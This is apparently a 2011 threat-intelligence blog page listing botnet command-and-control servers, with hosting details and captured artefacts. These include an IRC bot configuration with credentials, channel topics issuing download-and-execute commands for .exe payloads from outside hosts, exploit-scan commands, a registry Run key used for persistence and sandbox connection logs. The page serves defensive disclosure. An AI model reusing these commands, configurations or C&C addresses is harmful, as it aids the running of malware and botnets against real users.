Month: April 2011

213.165.70.210(linux bots hosted in Germany Berlin 1&1 Internet Ag)

Uncategorized

var $config = array(“server”=>”213.165.70.210”, “port”=>”6667”, “pass”=>””, “prefix”=>”psychoz`x`”, “maxrand”=>”4”, “chan”=>”#!scann”, “chan2″=>”#2”, “key”=>”kimi”, “modes”=>”+p”, “password”=>”2002”, “trigger”=>”.”, “hostauth”=>”*” // infos about hosting: http://whois.domaintools.com/213.165.70.210

92.241.165.156(botnet hosted in Russian Federation 2×4.ru Network)

Uncategorized

92.241.165.156:1234 Nick: NEW-[AUT|00|P|66839] Username: XP-2398 Server Pass: xxx Joined Channel: #!nn! with Password test Channel Topic for Channel #!nn!: “D http://tygillmor.com/index.php?=” * Now talking in #!nn! * Topic is ‘.m.s|.m.e hahhahaha foto 😀 http://ialongsdor.net/facebook/index.php?= ‘ * Set by wd22 on Tue Apr 05 13:09:13 infos about hosting: http://whois.domaintools.com/92.241.165.156

hahahaha.ishtiben.com(botnet hosted in China Beijing Chinanet Jiangxi Province Network)

Uncategorized

botnet C&C irc hahahaha.ishtiben.com DNS_TYPE_A 60.190.218.104 123.183.217.32 59.63.157.62 60.190.218.104:7196 Now talking in #! Topic is ‘.asc -S|.http http://194.28.44.208/new1.exe|.asc exp_all 25 5 0 -a -r -e|.asc exp_all 25 5 0 -b -r -e|.asc exp_all 20 5 0 -b|.asc exp_all 20 5 0 -c|.asc exp_all 10 5 0 -a|.r.getfile -S|.r.getfile http://194.28.44.208/m.exe C:xdx.exe 1 -s’ HKLM​SOFTWARE​Microsoft​Windows​CurrentVer!​policies​Explorer​Run​ Microsoft DriverRead more...

aminizakoycam.co.cc(botnet hosted in Turkey Engin Rencber)

Uncategorized

Remote Host Port Number 178.162.158.138 6667 PASS timu 74.86.183.197 80 MODE USA|86530 -x+i JOIN #1 timu USERHOST USA|86530 PRIVMSG #1 :- download – Downloading URL: http://www.freeflow.in/am2.exe to: c:/am2.exe. – downloaded 96.5 KB to c:/am2.exe @ 96.5 KB/sec – opened c:/am2.exe NICK USA|86530 USER ppdqhcd 0 0 :USA|86530 NICK [USA|XP|539487] USER srmyidk * 0 :COMPUTERNAME infosRead more...

onlinedatingsecretfriends.com(gbot hosted in United States Austin Road Runner Holdco Llc)

Uncategorized

folusho.com 67.222.55.143 127.0.0.1 127.0.0.1 hostinganddedic.com 188.72.230.129 searchmobilecode.com zonetf.com www.google.com 74.125.77.147 www.yahoo.com 87.248.122.122 Opened listening TCP connection on port: 62970 Outgoing connection to remote server: folusho.com TCP port 80 Outgoing connection to remote server: hostinganddedic.com TCP port 80 Outgoing connection to remote server: www.google.com TCP port 80 Outgoing connection to remote server: www.yahoo.com TCP port 80Read more...